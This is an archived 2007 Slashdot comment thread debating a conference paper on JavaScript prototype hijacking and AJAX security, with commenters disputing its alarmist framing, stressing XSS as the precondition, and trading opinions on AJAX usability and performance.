Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 



Forgot your password?
typodupeerror
×
Security The Internet Java Programming

AJAX May Be Considered Harmful 308

87C751 writes "Security lists are abuzz about a presentation from the 23C3 conference, which details a fundamental design flaw in Javascript. The technique, called Prototype Hijacking, allows an attacker to redefine any feature of Javascript. The paper is called 'Subverting AJAX' (pdf), and outlines a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it."
This discussion has been archived. No new comments can be posted.

AJAX May Be Considered Harmful

Comments Filter:
  • first post (Score:5, Funny)

    by Anonymous Coward on Saturday January 06, 2007 @04:21PM (#17491204)
    So can I hijack slashdot to always get the first post?
    • re: first post (Score:4, Interesting)

      by jimbojw ( 1010949 ) <wilson@jim@r.gmail@com> on Sunday January 07, 2007 @02:08AM (#17495424) Homepage
      You might - if you can find an available XSS vulnerability to use as a vector. TFA assumes this blithely for the sake of demonstration, but it's a big assumption.

      Further, the slashdot summary suggests that Prototyping is a design flaw in JavaScript/ECMAScript. This wrong for two reasons:
      1. The article doesn't mention this.
      2. Prototyping is not a design flaw.
      Prototyping is a very useful language feature that can be used to do all sorts of things that would otherwise be cumbersome or impossible. Ruby is a prototyped language - a feature which is responsible for much of the 'magic' of Rails.

      The article does outline a number of Ajax related vulnerabilities, but like most vulnerabilities, they can be mitigated or avoided entirely if paid attention to - much like the SQL injections of old.

      Arguing that Prototyping or Ajax makes JavaScript unsafe is fud. These are powerful language features that (like any powerful feature) can be used for evil if an injection mechanism is available.
      • Re: first post (Score:5, Insightful)

        by Crayon Kid ( 700279 ) on Sunday January 07, 2007 @08:03AM (#17496950)
        [..]if an injection mechanism is available.
        Therein lies the cruft of the issue. XSS is the culprit, not Ajax, not prototyping, not JavaScript itself. It all comes down to incompetent developers allowing visitors to inject JavaScript that other visitors will execute. Period. Once custom JS is executed all bets are off, assume the worst.

        This is an extremely basic point in security of any kind: once the attacker is executing code inside your system, that's bad. Nevermind that fact that other limiting factors will mitigate the range of the attack (browser-only for JavaScript, account-permissions-only for other attacks). Most efforts should be made to prevent intrusion, not to limit damage after the attacker is "in".
  • by mobby_6kl ( 668092 ) on Saturday January 06, 2007 @04:21PM (#17491208)
    Not surprising considering that slashdot is slowly trying to AJAXify itself...
  • Haven't RTFA yet, but I doubt it will live up to the hype.
    • by Anonymous Coward on Saturday January 06, 2007 @05:14PM (#17491660)
      I haven't read it either, but from experience, I'd imagine it hold up very well.

      AJAX applications just aren't solid or stable, for the most part. We tried to integrate a number of them into our network here, and frankly each attempt went terribly. I'd like to think it was just one application vendor or AJAX toolkit that was problematic, but that wasn't the case.

      We found a number of common problems with every AJAX application we tried. Just for the record, the applications included three CMS systems, a Web-based email system, two groupware systems, and three Web forums.

      The first major problem with one of resource usage, on both the client-side and the server-side. Client-side, many AJAX applications consume far too much CPU time. From our investigation, it was due to the use of poor JavaScript algorithms that'd consume 100% of the CPU in some cases, for minutes on end. The applications "worked", in that they'd provide the correct result. It'd just take them far too long to get it done.

      On the server-side, they'd again result in excessive CPU and RAM consumption. For one of the Webmail systems, we could only handle a fifth (yes, 20%) of what our old Perl-based system could. And that was on a quad-core Opteron system with 8 GB of RAM! The Perl-based system was on a couple of 200 MHz Pentium systems, each with 128 MB of RAM. Even after assistance from the AJAX-based Webmail system's vendor, we were only able to handle roughly 90% of the number of transactions of our older system.

      The second major problem is that of usability. Many of the AJAX apps we tried didn't play well with browser tabs, for instance. Some even fucked around with text input areas, resulting in copy-and-pasting no longer working. One application even prevented the text within a text field from being highlighted! We thought these problems may be browser-specific incompatibilities, be we ran into this same problem with Firefox, Safari, Opera, and even IE6! After talking with the vendor, they admitted these were known problems, and no solutions were presently available.

      The third major problem is a lack of quality. Many AJAX applications are poorly coded and poorly designed. I think the main reason for that is because it's such an unstructured technology. Even competent software developers run into problems that cannot be solved easily, and thus must resort to hackish techniques to overcome these inherent problems.

      The fourth major problem was that the users hated the systems. Of the few systems we managed to roll out successfully, the users absolutely hated them. Their complaints were a combination of the above three factors. The AJAX applications would not do what the user wanted. The AJAX applications did not conform to common practices (eg. copy-and-paste, textbox text selection, etc.). The AJAX applications ran far too slowly, even on fast client machines. The AJAX applications just plain didn't work!

      All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use. They perform far better on much fewer resources, actually do what the users want, avoid violating the most common of conventions, and they do what they're supposed to. I'm sorry to say it, but AJAX might just be the worst technology I have ever had to deal with.

      • I have all those problems with changepoint. It's supposed to make our life easier but it's a huge nightmare. It's slow - on my dual core centrino and 2GB RAM it crawls. On 12MB internet link. Plus because somebody forgot to update a code it doesn't work with IE7 (which I use it for testing and sucks) AND Firefox.
        Same is with for example yahoo mail. All my friends who used the 'new improved' one, reverted to old one. Too slow and annoying.
        There's more examples like that. When finally vendors understand that
      • Sorry, I still don't think that it will "kill the Web as we know it." That's sensationalist, fear-mongering BS.
      • by Zarel ( 900479 ) on Saturday January 06, 2007 @06:42PM (#17492450)
        Have you ever considered that those could all be badly programmed? I mean, I could write a Java program that took tons of resources, ran really slowly, didn't allow text selection, and more. And I could write an Ajax application that ran far faster than the equivalent non-Ajax one.

        As for your specific case of a text field being unhighlightable, I suspect that has to do with the Ajax application using onSelectStart to disable selection within the page (sometimes as really crappy DRM, sometimes because click-and-dragging is needed for some other functionality), and not knowing how to re-enable it for the text field (which is something I, a 16-year-old, know how to do). Problems like the ones you describe are usually caused by vendor incompetence.

        Ajax, by itself, can't possibly cause any of the problems you describe. All it is is a system by which Web pages can interact with the server without needing to load a new page. This means:

        1. Less bandwidth is used because you don't need to load layout information for each page. Consequently, it's faster than non-Ajax applications.

        2. The Back button goes to the last page, as opposed to the last action, which is a good thing for true Web applications, since the Back button usually causes tons of problems (Ever seen "DON'T PRESS THE BACK BUTTON OR YOU COULD ACCIDENTALLY PAY FOR THIS PRODUCT TWICE"?).

        3. If coded to do so, the server can relegate translating raw data into a human-readable HTML layout to the client. This is usually done because the client usually has many processor cycles to spare, while the server doesn't. (This also doesn't take much processing power, and should be unnoticeable to the client)

        4. You have more control over page transitions, and you can have things like "Loading..." messages while the data is being fetched from the server (as opposed to traditionally, where the only indication is "Loading..." in the browser status bar and the top right loading animation, and then, when it loads, the page goes white and the new layout is loaded.)

        Those are the only differences. So, in reality, Ajax is superior in every way for Web applications, and the problems you describe are caused by bad programming practices, and would've happened whether or not they were written in Ajax.
        • Re: (Score:3, Informative)

          by julesh ( 229690 )
          2. The Back button goes to the last page, as opposed to the last action, which is a good thing for true Web applications, since the Back button usually causes tons of problems (Ever seen "DON'T PRESS THE BACK BUTTON OR YOU COULD ACCIDENTALLY PAY FOR THIS PRODUCT TWICE"?).

          The Post-and-Redirect design pattern (or the use of unique once-only form ids) solves this problem in almost all cases. Only badly written web apps still suffer from it.

          The rest of your points are good, though.
      • by 75th Trombone ( 581309 ) on Saturday January 06, 2007 @07:30PM (#17492852) Homepage Journal

        You've stated quite an amount of vagueness there, sir, not to mention this confounding statement:

        All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use.

        Very interesting, seeing has how AJAX has nothing to do with your server-side technology whatsoever. Or how about this:

        The AJAX applications did not conform to common practices (eg. copy-and-paste, textbox text selection, etc.

        Again very interesting, seeing as how AJAX itself has nothing to do with the way users interact with form elements.

        It sounds to me like either 1) you're BSing, which is my actual guess, or 2) your and your team have no idea how to actually code Javascript/AJAX/whatever, and you picked crappy packages off the internet and expected them to Just Work out of the box the same as your custom built solution.

        Your problems have had nothing to do AJAX; rather, they have had to do with either your lack of knowledge or your life as a Slashdot troll.

      • by misleb ( 129952 ) on Saturday January 06, 2007 @08:45PM (#17493416)
        On the server-side, they'd again result in excessive CPU and RAM consumption.


        I'm going to call bullshit here. An ajax application is not significantly different on the server side than a regular web app. In fact, it is often easier on the server because the server only needs to render a small portion of the result for a given action rather than and entirely new page.

        The Perl-based system was on a couple of 200 MHz Pentium systems, each with 128 MB of RAM. Even after assistance from the AJAX-based Webmail system's vendor, we were only able to handle roughly 90% of the number of transactions of our older system.


        What does "perl based" have to do with it? You could very well have a Perl based (on the server side) AJAXy application.

        All of our AJAX trials were abysmal failures. That's why we're sticking with the existing Perl- and Java-based systems that we currently use.


        Bullshit again. You are comparing AJAX with Perl/Java based systems as if there was any comparison to be made. Saying Perl based systems are better than AJAX systems is like saying roads are better than cars!

        But thanks for you input anyway, Mr. Coward.

        -matthew
    • by Tablizer ( 95088 ) on Saturday January 06, 2007 @05:14PM (#17491664) Journal
      Haven't RTFA yet, but I doubt it will live up to the hype.

      Which hype, AJAX itself or AJAX ending the world?

      Does Al Gore know anything about this?
               
  • by JoshJ ( 1009085 ) on Saturday January 06, 2007 @04:22PM (#17491216) Journal
    Javascript vulnerabilities will stop people from using AJAX just like Word vulnerabilities will stop people from using Microsoft Office.
    • Re: (Score:3, Informative)

      by cnettel ( 836611 )
      Well, ever since Word 97, there have been features intended to let the user disable auto-running macros. That's also been the default. This is not really a problem, as most Word files should not contain macros. Even if they do, most files are still useful without them, and are probably used within the context of a controlled intranet (with code signing in place). If the view that Javascript is inherently impossible to make secure would gain ground, AJAX would go the way of ActiveX controls.

      Now, I know you

      • the web would certainly change if that attitude would turn into norm.

        After 'change' you forgot to include 'for the better' :)

    • When vulnerabilities of C/C++ stop people from using C/C++, this may happen.
    • Yup, everyone i know has stopped using it.. Microsoft is going broke since they cant sell MSO anymore.

      Nah, people really dont care/understand/know.
    • Re: (Score:3, Insightful)

      by jellomizer ( 103300 ) *
      Boo Hoo. You hate new technologies so you get modded insightful.
      I really don't see what there is this huge hatred towards Javascript. Javascript and now AJAX (which is just a method of using JavaScript) Is actually one of the best combining server and client side applications, that will work multi-browers and multi-platform. As well the band with savings can be good because you will only send the information you need once. Things like Flash, JavaApplets, Active X are good examples of a bad attempt to
  • Web 2.0.1 (Score:5, Funny)

    by ticklish2day ( 575989 ) on Saturday January 06, 2007 @04:23PM (#17491226)
    Patch the hole and release Web 2.0.1. Good thing there's already a Web 3.0 [alistapart.com] in the works.
  • Greasemonkey? (Score:2, Interesting)

    Isn't this the thing that forced the redesign of Greasemonkey a while back?
    • Re:Greasemonkey? (Score:4, Informative)

      by JackHoffman ( 1033824 ) on Saturday January 06, 2007 @04:49PM (#17491444)
      No, Greasemonkey exposed security sensitive functions to websites. They were meant to be used by Greasemonkey scripts but websites had access too.

      This is about the way Javascript implements object oriented programming: In Javascript you don't define classes from which objects are instantiated. In a nutshell, you create prototype objects and new objects are copies of the prototypes. The "attack" is to change existing prototypes. For example, you can add a new function to the String prototype or replace an existing function with your own implementation. Every String object then gets the new function. There is one problem with this: Cross site checks don't apply. A script from one site can't simply communicate with another site, but it can modify the prototypes that the scripts from the other site use and subvert the communication of the other script with its host.
      • by gkhan1 ( 886823 )
        That's.... I mean.... WOW! Thank you for explaining.
      • Re:Greasemonkey? (Score:5, Insightful)

        by suv4x4 ( 956391 ) on Saturday January 06, 2007 @08:09PM (#17493150)
        There is one problem with this: Cross site checks don't apply.

        You didn't test that and just assumed it's true I guess. But if they applied, and each page context runs in its own sandbox with its own version of String, Number, and so on, you'd sound pretty stupid right?

        Try it yourself, the prototypes are NOT shared. They are not shared even among two page tabs on the same domain.

        In fact not shared even among two instances of the SAME PAGE.

        Embarassing, I guess, for all modded 5+ claiming this on this article.
  • by Sloan47 ( 977340 ) on Saturday January 06, 2007 @04:27PM (#17491262)
    "...and could kill the Web as we know it." Oh come on! Isn't that exaggerating a tad? Obviously with some browser patches and more secure server code, the problem is solved. Gotta love sensationalism!
    • by mctk ( 840035 )
      No. It won't be okay. The internets will die.

      It's been fun intar-web! We've had some good times! Never let go!
  • notabug (Score:3, Insightful)

    by QuoteMstr ( 55051 ) <dan.colascione@gmail.com> on Saturday January 06, 2007 @04:31PM (#17491290)
    This paper is absolutely ridiculous, and its author is scaremongering --- if you have access to a site's scripting system via some cross-site vulnerability, then you don't _need_ to subvert an object's prototype to change its behavior. If you're relying on client-side code of any sort, be it written in Javascript or C, for security, you're up a creek without a paddle anyway. Oh nooes, man in the middle proxy attacks! Oh noes, browser bugs allowing javascript to leak outside its security context! There is no security vulnerability in this paper that hasn't been known and worked around for years. I'm wondering what kind of agenda the author has in writing this, actually.
    • Re: (Score:2, Funny)

      by kfg ( 145172 )
      This paper is absolutely ridiculous, and its author is scaremongering

      He's obviously been watching to much local weather forecasting lately:

      "Scattered showers in the afternoon; Save the women and children!"

      The Society of Hysteria really is getting to be a bit much.

      KFG
    • Re:notabug (Score:5, Informative)

      by coma_bug ( 830669 ) on Saturday January 06, 2007 @04:56PM (#17491476)
      I'm wondering what kind of agenda the author has in writing this, actually.

      page 3
      This technique has been found by S. Di Paola and is called Prototype
      Hijacking
      . It represents the state of the art in hijacking
      techniques applied to the Javascript language.

      page 6
      This new kind of attack has been called AICS and has been thought by S.
      Di Paola and G. Fedon and developed by S. Di Paola.

      page 8
      Stefano Di Paola. Senior Security Engineer of proved experience, works
      since many years as an IT consultant for private and public companies.
      He teaches Database Programming and Information Security at the
      University of Florence. Since 1997 is a well known security expert; he
      found many of the most dangerous vulnerabilities in recent releases of
      MySQL and PHP. From 2004 his researches focused mainly on Web security.
      Actually he is part of OWASP (Open Web Application Security Project)
      team and he's the focal point of Ajax security for the Italian Chapter.

      He is the creator of http://www.wisec.it/ [wisec.it]

      Giorgio Fedon. Currently employed as senior security consultant and
      penetration tester at Emaze Networks S.p.a, delivers code auditing,
      Forensic and Log analysis, Malware Analysis and complex Penetration
      Testing services to some of the most important Companies, Banks and
      Public Agencies in Italy. He participated as speaker in many national
      and international events talking mainly about web security and malware
      obfuscation techniques. During his past job he was employed at IBM
      System & Technology Group in Dublin (Ireland).

      Actually he is part of Owasp (Open Web Application Security Project)
      Italian Chapter.
    • by KalvinB ( 205500 ) on Saturday January 06, 2007 @05:04PM (#17491554) Homepage
      JavaScript S on Domain A needs to access the server side script on Domain B. All S has to do is AJAX to a local bridging script which forwards the request using CURL,LWP, etc to B. The bridge then feeds the response to S. S has no idea that the AJAX request went to another domain. As far as B knows, A is just a web visitor.

      Since AJAX runs on the client side it's not possible to whitelist IPs and Referers can be spoofed.

      As with every client/server app the client can never be trusted.
      • In other words, if your javascript calls anything that proxies a resource, normal per-domain restrictions don't apply.

        This isn't even XSS. Its just how it works ...

        Wake me up when there's some REAL news :-)

    • Re:notabug (Score:5, Informative)

      by stonecypher ( 118140 ) <stonecypherNO@SPAMgmail.com> on Saturday January 06, 2007 @05:11PM (#17491632) Homepage Journal
      This paper is absolutely ridiculous, and its author is scaremongering

      Try reading the paper before lambasting it. The stuff you saw in the slashdot article isn't in the paper. The author of the paper says things like "innovative new attack" and "next generation of server side injection." The stuff about end of the web as we know it is from the slashdot poster. The paper is quite insightful, and the author is almost blase about the whole thing. It's quite clear that he simply believes he's unearthed a new form of attack, and he's in fact quite correct.

      Please get off of your soapbox. You're wrong.
      • Re: (Score:2, Informative)

        by coma_bug ( 830669 )
        Try reading the paper before lambasting it. Well I have read the paper and it is absolutely ridiculous. If the attacker can inject JavaScript or HTML or whatever into the connection it doesn't matter whether the site is Web 1.0, Web 2.0 or Web 3.14159 because the session is compromised anyway. If you want web security you'll need TLS.
      • The paper is quite insightful, and the author is almost blase about the whole thing. It's quite clear that he simply believes he's unearthed a new form of attack, and he's in fact quite correct.

        No, the author has not actually unearthed anything new; the mutability of object prototypes is a well-known and well-understood aspect of JavaScript. The potential to cause unexpected behavior by changing the prototypes of built-in objects is likewise well-known and well-understood (and has been a source of com

        • Neither of these things are new. The idea of using them to launch an attack, by altering the behavior of existing objects so that trusted JavaScript behaves differently than expected, may possibly be new

          The possibility of using them to launch an attack is what he's claiming is new, and I've never heard of it before. This is something I keep up with, so I'm going to remain somewhat firm in my belief that this is an insightful paper until someone shows me prior exposition.
          • This technique requires the prior existence of a full-exploitable XSS hole before it can work; otherwise the script which modifies object prototypes never loads and never executes. Again, the author of this paper is simply saying, "if your site has an XSS hole I can use an XSS exploit against it". This would be akin to a physical security expert pronouncing that he can get into your house if you leave your doors and windows unlocked, and is not earth-shattering or insightful in any way; the only reason it's

    • Heh. I love the 'notabug' tracker tag. Dismisses the submitter politely.

      But, yes, there is nothing new in AJAX that causes security problems. It is not new tech, just a style of architecture. The same problems and solutions with respect to security exists for AJAX as for the underlying infrastructure. Java applets, Flash apps, "traditional" Javascripted pages, all have had their trials and tribulations in the past, and their security models are well mapped-out. The sandboxes already exist. AJAX ru

  • by levell ( 538346 ) on Saturday January 06, 2007 @04:35PM (#17491322) Homepage

    Having skim read the article, it outlines how *if* you can execute malicious javascript for a website you can subvert the AJAX communication so that you can have man in the middle attacks etc.

    However once an attacker can execute malicious javascript in the scope of the target website you're toast whether you are using AJAX or not.

    I'll make a bold prediction and say that is not going to "kill the Web as we know it" contrary to what the /. article says.

    • Re: (Score:3, Funny)

      by Vo0k ( 760020 )
      1. Prepare malicious javascript code capable of subverting AJAX in the domain it's installed in.
      2. ???
      3. Subvert their AJAX, intercept their communications, change their content, kill the Web as we know it, and ultimately, profit!!!
  • a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

    This statement has FUD written all over it. (or was it written in FUD?)

    • Re:FUD? (Score:5, Funny)

      by ednopantz ( 467288 ) on Saturday January 06, 2007 @04:43PM (#17491394)
      >(or was it written in FUD?)

      Ok, I propose we create a new programming language called FUD. Variables will be assumed to have their most sinister values and be impossible to verify.
      • Re: (Score:3, Funny)

        Ok, I propose we create a new programming language called FUD. Variables will be assumed to have their most sinister values and be impossible to verify.

        Is that language derived from brainfuck?

    • Re:FUD? (Score:5, Funny)

      by monoqlith ( 610041 ) on Saturday January 06, 2007 @04:46PM (#17491418)
      . (or was it written in FUD?)

      Sadly, no. The FUD compiler was written in Javascript, and was hijacked.
    • by wasted ( 94866 )
      ...a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

      This statement has FUD written all over it. (or was it written in FUD?)

      I was hoping that it wasn't totally FUD, and the result would be that the term Web 2.0 would be killed. Guess my luck isn't that good.
  • I hate JS, it Had potential, 8-9 years ago. What we are seeing now is a push way beyond its original intended scope. The truth is, it would have had much less potential for vunerability if it had not been neglected for so long. Every time I have to get down and dirty with it I think of that. Its Ok, and somethings are nice from a shorthand perspective if youre used to other lll, but for GODS Sake , Revise the spec and put some effort into it, OH Wait, but thats been part of the problem all along, MS puts th
    • by cnettel ( 836611 ) on Saturday January 06, 2007 @04:47PM (#17491434)
      Python also allows on-the-fly redefinitions, which is blamed here. Generally, the choice of scripting language is not the problem here. Most "Javascript" bugs translate directly into VBScript if you're IE-masochistic (or Perlscript, if you've managed to install that and trick IE into running the engine for it). The problem is in the DOM, what objects might theoretically be exposed, and how it's crucial that some part of the browser can access them, while others should not. After all, in Mozilla, the whole UI is held together by Javascript, running in basically the same engine, but a different sandbox. The situation with the IE scripting environment is quite comparable.
    • Re: (Score:3, Insightful)

      by FLEB ( 312391 )
      The problem is that any other interactivity solution has to be universally applied, and right now there's a universal solution that's adequate, more adequate than instituting a ground-up rebuild, so anything in the future is going to be tacked-on to that. I suppose the best we can hope for is incremental, inside-to-out cleanup of the language, and, like CSS and "quirks modes" do, old code that breaks is switched to a legacy mode. Still, though, I think it's going to stay JavaScript, at least for the forseea
      • Re: (Score:2, Interesting)

        by kirun ( 658684 )

        "Javascript is nothing related to Java".

        It didn't use to be (apart from both of them having C-related syntax and Interweb-related hype), but it is now [mozilla.org] if you're using Firefox. For example, the following works:

        <script> document.write(new java.lang.String("I'm here")); </script>

        They're no fun though, they left out stuff like java.io

    • by smittyoneeach ( 243267 ) * on Saturday January 06, 2007 @05:01PM (#17491522) Homepage Journal
      What we are seeing now is a push way beyond its original intended scope.

      Name a Turing-complete programming tool which has not seen this.

      I throw in the qualifier because, other than stuff like regular expressions and SQL, which are not Turing-complete and have blissfully narrow scopes, everything else has seen javascript-acular scope creep.

      Here, have an httpd written in PostScript: http://public.planetmirror.com/pub/pshttpd/ [planetmirror.com]

      Perhaps not being Turing-complete is a left-handed virtue.
      • by truedfx ( 802492 )
        I throw in the qualifier because, other than stuff like regular expressions and SQL, which are not Turing-complete and have blissfully narrow scopes, everything else has seen javascript-acular scope creep.
        Extended regular expressions have been used as tests for prime numbers [pm.org]. I'd say that counts as beyond the original intended scope.
        • by WillerZ ( 814133 )
          SQL is now used to select messages for delivery in JMS, which it wasn't designed for. It's difficult to do efficiently in that situation, and thus no-one has yet.
      • I cannot disagree. BUT it dosent mean its the right choice or even a good choice.
        I am an extremley adept programmer. I have been coding since I was 7 (in 1977) I started with Fortran (Yes 77 :)
        I could, code web pages, or whatever in assy if I wanted .
        When .Net was announced and the first CLR specs were released for "ratification" I started (just for shits and grins) to code in CLR Assembler it was a challange and something I have yet to find one of my contemperaries can do. well.....its proved valuable
        • Re: (Score:3, Interesting)

          I could, code web pages, or whatever in assy if I wanted .
          What web browser are you using that has a built in assembler?
    • by pestilence669 ( 823950 ) on Saturday January 06, 2007 @08:26PM (#17493282)
      JavaScript has gotten a pretty bad rap. I think unfairly. People tend to pigeonhole it as a "web" scripting language, which is certainly how it started off, but it's much more capable than that. Even Java started off as a "Web" language (with ambitions of world domination). Both have matured in the past decade.

      JavaScript has all the niceties of modern OO languages and more, because it's prototype-based. All that's needed is some discipline, because it also allows you to write exceptionally ugly code. Both Perl and C++ are the same way. You can drop into procedural hell any time you like. In C++, you can even resort to goto statements or drop into assembler.

      In JavaScript: you can have static class methods & members, encapsulation (private methods & such), multiple layers of abstraction, and features even Java can't handle, like: multiple inheritance, closures, reflection, and dynamic typing. Not to shabby for a crappy little scripting language.

      Any nice OO language (like Python, Smalltalk, Ruby) in a browser sounds wonderful... but it'll never work for very long. Do you really think that Microsoft could keep proprietary language tweaks out of their implementations? It happens with JavaScript all of the time. Netscape added proprietary features because it was THEIR language. AFAIK, that stopped as soon as it was offered up for standardization.

      Microsoft has continued to make proprietary "contributions" to JavaScript. If it weren't for them, everybody's JS implementations would work together in harmony. Microsoft alters their HTML, XML, CSS, and C++ implementations in ways that prohibit cross-platform compatibility (what a surprise). They'll do the same to Python.
  • Crying "Wolf" (Score:3, Interesting)

    by flajann ( 658201 ) <fred.mitchell@gm ... minus herbivore> on Saturday January 06, 2007 @04:41PM (#17491372) Homepage Journal

    Do they ever learn? All of this scaremongering is numbing the uninitiated, and when there is a real threat no one will be prepared.

    Well, my BS meter pings off the scale when I see alarmist claims like "shutting down the web." How many of those claims have we all seen over the past years?

    I suppose it's the 21st-century equivalent of "The World is Comming to an End!"

    I consider that anyone who makes such outlandish claims should be remembered, indexed, marked, and noted. When their claims fails to come true, then we can all stand around and laugh at them and grant them Idiot Awards.

  • by Chineseyes ( 691744 ) on Saturday January 06, 2007 @04:44PM (#17491400)
    A Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it lurks is the deep dark recesses of the javascript
    Who is this masked man known as the worm?
    Why does he hate Web 2.0 so much?
    Will this worm try to make us revert to Web 1.0?
    And does this worm have anything to do with disappearances of Web 1.1 through Web 1.9?
    This and much much more on the next epside of Days of our Web 2.0 Lives
  • AJAX != the web (Score:4, Insightful)

    by Anonymous Brave Guy ( 457657 ) on Saturday January 06, 2007 @04:45PM (#17491408)

    The paper is called 'Subverting AJAX' (pdf), and outlines a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.

    Well, considering that AJAX is used on only a tiny proportion of web sites, and often not to particularly good effect, I'd say that's a bit of a silly claim. In any case, AJAX often suffers from the same flaws as pseudo-web technologies like Flash before it: lack of bookmarkability, breaking back buttons, etc. These are far more likely to doom it than any random security flaw.

  • solutions (Score:3, Informative)

    by fyoder ( 857358 ) on Saturday January 06, 2007 @05:03PM (#17491552) Homepage Journal
    • server side: never trust user data.
    • client side: You're hosed. But if you're smart you already regard yourself as hosed. There have been security bugs where a maliciously crafted image could get you. Before going to shady sites you turn off java, javascript, and you would never even visit a shady site with IE. Turning off javascript might make a 'Web 2.0' site unusable, but it's a question of trust.

    If 'Web 2.0' comes to be widely untrusted, it will have to change or die. This doesn't represent any new threat to the web itself. The threats are old and because of their nature have been there from the beginning and aren't going away any time soon.

  • One of the biggest issues I have with Ajax and really what the web browser has turned into is Javascript.

    Don't get me wrong, I think the language is "alright". The problem is it is the only choice out there.

    There are many flavors of Linux and pratically everytype of appliation out there. But only one real choice for scripting on a web page.

    Ajax's primary function is the ability to grab content from a web server ( or any server ) and then modify DOM of the web page you are working on.

    The could be done by any
    • First, Jscript ne JavaScript
      Second, if you're unlucky enough to be using IE you do have alternatives: VBScript and,
      if you have installed ActiveState, PerlScript (not that I recommend enabling a browser
      with such power). I also seem to recall a Tcl plug-in back in the day.

      Nevertheless, JavaScript is the de fact standard and so everybody uses it, to minimize
      the potential for "foo only" websites.
  • by Vo0k ( 760020 ) on Saturday January 06, 2007 @05:10PM (#17491616) Journal
    Ajax sucks. Not because of security.

    The article Why Ajax Sucks (Most of the Time) [usabilityviews.com] is a nice spoof of an old article about frames. Despite being a spoof, the word 'frames' replaced by 'ajax' and little else changed, it's surprisingly accurate and nicely outlines WHY it's harmful.
  • Anyone know where I can find a non-PDF version of this paper?
  • According to the label:
    Eye irritant. In case of eye contact, flush with water. To avoid harmful fumes, do not mix with ammonia or other cleaning products. Keep out of reach of children.


    I don't think Comet is any better.
  • by Trails ( 629752 ) on Saturday January 06, 2007 @06:37PM (#17492396)
    As well as the dingbat mod who let this crap summary get on /. unedited?

    I hate all this crap about "ZOMG, once I can inject javascript into a page, something else makes it totally insecure!!!"

    Once someone can inject javascript onto a page, you're toast. The article itself is valid, and isn't complaining about ajax so much as prototyping (despite the title of the paper).
  • Meh... (Score:3, Insightful)

    by Anonymous Coward on Saturday January 06, 2007 @06:41PM (#17492442)

    I'm a professional web developer, amd have been using XMLHttpRequest (ajax, if you really want) for the past two years in a large number of web applications. Having taken the time to actually carefully read (not skim) the eight pages of this document, I have only one thing to say: I want my 15 minutes back.

    This is a paper about more efficient ways of being malicious, but they only work if you can be malicious in the first place.

    You know what? If a malicious user can insert script to be executed for another user, I already have an unacceptable problem! I really don't care if that unacceptable problem is now 10% worse than was generally realized before.

  • by Original Replica ( 908688 ) on Saturday January 06, 2007 @06:58PM (#17492598) Journal
    Damn Right! If you mix that stuff with a chlorine bleach, the fumes will put you straight in the morgue.
  • (Yawn) Death of the internet, ho hum.

    It already died. In 1996. Bob Metcalfe [wikipedia.org] said so, didn't he?
  • I'm no JS expert, but it would seem that an easy fix is simply to contextualize JS prototypes - One document/frame can't modify prototypes for another.
    • by porneL ( 674499 )
      That's the case already. I've checked Opera, Safari and (Gecko-based) Camino - all have completly separate set of prototypes for each frame, so you can't circumvent XSS protection using prototypes.

      So it seems there's nothing to get excited about - you must have exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet.
  • by Animats ( 122034 ) on Saturday January 06, 2007 @08:24PM (#17493268) Homepage

    Nobody is explaining this right.

    JavaScript has a security policy. The security model is that 1) scripts can only talk to the site from which the script came, and 2) scripts can only alter documents from the site from which the script came. The security model is enforced only at a few points, notably the XMLHttpRequest object and at points where Javascript stores into the document object tree.

    Other than those few enforcement points, JavaScript objects in the same browser instance can communicate freely. This offers a number of potential exploits, some of which are listed in the paper.

    If the security model is tightened up, prohibiting all intercommunication between Javascript objects from different sites, "mashups" no longer work, so it's too late to tighten this up without breaking some popular sites.

    This is going to be hard to fix without breaking existing programs. Javascript has a very weak concept of what's immutable. It might work to mark functions as "dirty" if changed once loaded, then forbid "new" on "dirty" functions. That would prevent changing the base instance of a class without breaking too much else, and would fix this new vulnerability. But it wouldn't fix all potential vulnerabilities in that area. As long as multiple scripts share global variables, there's going to be potential for trouble.

    Maybe "https" pages should be locked down more. "Secure" pages should be single source - everything has to come from one specific domain address. No frames, no cross-site anything - one secure site per window, and no shared data with other pages whatsoever. That's a start.

  • Neuromancer (Score:4, Funny)

    by noz ( 253073 ) on Saturday January 06, 2007 @08:40PM (#17493382)
    ... a possible Web Worm that lives in the very fabric of Web 2.0 and could kill the Web as we know it.
    My deck is damaged. I must break through the ICE! Where are my Yeheyuans?
  • Doesn't include javascript.
  • I'm in the middle of writing a fairly complex application in which the UI is ajax based. The calls to the back end are all done via these ajax calls.

    At the end of the day, I verify the data I accept from the application before storing it. I don't trust anything coming from the client side. Just because it's ajax and I "think" I'm in control of the application doesn't mean that I am.

    Big deal.

    You still can send me options as selected if the options aren't in the list I offered you -- because I check. You can't send me invalid data because I check it for validity. That's my responsibility.

    You can get me to send you something you don't have access to, because the agents that retrieve the data are running under your authority -- not as a system admin. If you don't have access to them, the data won't exist for you.

    Again -- security happens at the back end. The front end is always to be considered hostile.

Every successful person has had failures but repeated failure is no guarantee of eventual success.

Working...